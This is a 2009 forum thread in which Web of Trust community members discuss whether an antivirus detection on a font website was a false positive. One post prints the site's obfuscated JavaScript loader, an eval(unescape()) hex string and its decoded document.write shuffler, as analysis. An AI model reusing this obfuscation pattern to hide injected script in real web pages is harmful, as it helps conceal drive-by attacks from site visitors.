I've never had it happen before, but Microsoft Security Essentials detected and removed a javascript file that it identified as "TrojanDownloader:JS/Agent.IH" on a page I was visiting: http:// www rune-fonts co uk/fontlist php (I didn't research other pages on the site). Because I don't really feel qualified to assess this sort of threat, I wanted to mention it on the forums in case the MS software produced a false positive. (The WOT rating of the domain is green but I added a comment and rated trustworthiness in the red). Thanks.
:(
Mon 16 Nov 2009 08.17.38 by Warxas
Sorry to hear that cyberwitch. You are very lucky that this is your only trojan so far, though! (Of course it's also good that Microsoft Security Essentials blocked it!)
Thank you for the heads up, I have rated the site red, agreed to your comment and placed my own comment on the scorecard.
Just one note, in the future please don't post LIVE malware links. Thanks! :D
Live link to malware
Mon 16 Nov 2009 08.27.51 by cyberwitch
Sorry about that, noted for next time.
Should we put this at the
Mon 16 Nov 2009 09.39.39 by Delan Azabani
Should we put this at the top of the forum topic list? Not a whole 123-rule rulebook, but a few important rules like not to post live links? I've e-mailed the developers on the Support page.
I think you have a false
Mon 16 Nov 2009 11.49.16 by osfijwoei390WEFw23sf
I think you have a false positive. This is the link for the Microsoft Security Essentials page for the pop up you got: http://www.microsoft.com/security/portal/Threat/En...
It is pretty generic. I also checked Google Safe Browsing and Wepawet and they both found nothing.
if u haven't already u can
Mon 16 Nov 2009 16.58.05 by demonluo
if u haven't already u can run ur browser in virtual environment w sandboxie...
http://www.sandboxie.com/
This is probably the source of the detection
Mon 16 Nov 2009 22.13.30 by amishrabbit
The following code is loaded in a javascript file on that page:
enc.js:
eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%72%52%72%52%72%52%72%28%74%65%61%61%62%62%29%20%7b%76%61%72%20%74%74%74%6d%6d%6d%3d%22%22%3b%6c%3d%74%65%61%61%62%62%2e%6c%65%6e%67%74%68%3b%77%77%77%3d%68%68%68%68%66%66%66%66%3d%4d%61%74%68%2e%72%6f%75%6e%64%28%6c%2f%32%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%09%68%68%68%68%66%66%66%66%3d%68%68%68%68%66%66%66%66%2d%31%3b%66%6f%72%28%69%3d%30%3b%69%3c%68%68%68%68%66%66%66%66%3b%69%2b%2b%29%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%29%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%2b%68%68%68%68%66%66%66%66%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%20%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%6c%2d%31%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%74%74%6d%6d%6d%29%3b%7d%3b"));
Decoded, that becomes:
eval(function RrRrRrRr(teaabb) {var tttmmm="";l=teaabb.length;www=hhhhffff=Math.round(l/2);if(l<2*www) hhhhffff=hhhhffff-1;for(i=0;i<hhhhffff;i++)tttmmm = tttmmm + teaabb.charAt(i)+ teaabb.charAt(i+hhhhffff);if(l<2*www) tttmmm = tttmmm + teaabb.charAt(l-1);document.write(tttmmm);};)
I leave it as an exercise to the reader why a website would go to such lengths to obfuscate code.
I don't believe this is a false positive.
I seen many video hosting
Mon 16 Nov 2009 23.49.01 by osfijwoei390WEFw23sf
I've seen many video hosting sites do that kind of obfuscation to prevent people from easily downloading videos or hotlinking to the videos. That code does not look all that suspicious.
Unmask
Mon 16 Nov 2009 23.50.56 by Warxas
Unmask Parasites finds the code suspicious as well. http://www.unmaskparasites.com/security-report/?pa...
Which I stated on my scorecard comment.
I've also seen this kind of code a lot
Tue 17 Nov 2009 18.45.24 by amishrabbit
...except I usually see it used by sites as a way to obfuscate driveby scripts or shellcode. It might be entirely benign in this instance, but we don't know for sure why it's there.
Could you give me a few examples of video sites that do this? I'm just curious.
I'm willing to bet the signature is based on the escaped hexadecimal for "eval(function" or "document.write" -- if it is, it probably is more overbroad than it should be. But I'm completely guessing here.
Microsoft security product
Tue 17 Nov 2009 13.20.25 by demonluo
Microsoft security product is famous for low F/P....
MSE also found Trojan on my computer
Wed 18 Nov 2009 23.11.52 by Jadeyes
I just downloaded Microsoft Security Essentials today and I did a full scan of my PC. MSE found Trojan:Win32/Jpgiframe.A on a few of my wallpapers, which I had downloaded from ewallpapers.eu. Most of these wallpapers are ok, but you never know... So beware of this website and scan your computer frequently with several scanners. I have always used and scanned my PC with MBAM, SAS and Avira, but only MSE found these threats. That's not good :(
re: Trojan:Win32/Jpgiframe.A
Thu 19 Nov 2009 01.39.24 by g7w
Trojan:Win32/Jpgiframe.A
I'm curious as to which wallpaper files were detected. Wallpaper name and resolution or, better, the direct URL would be nice. ;-)
ewallpapers.eu is green though there are a few comments about malicious files.
I've just downloaded several wallpapers at different resolutions and all are clean...
-------
WOT Services Ltd. - gives us safety through Web of Trust.
WOT Community - gives us security through unity.
Thank you all
- G7W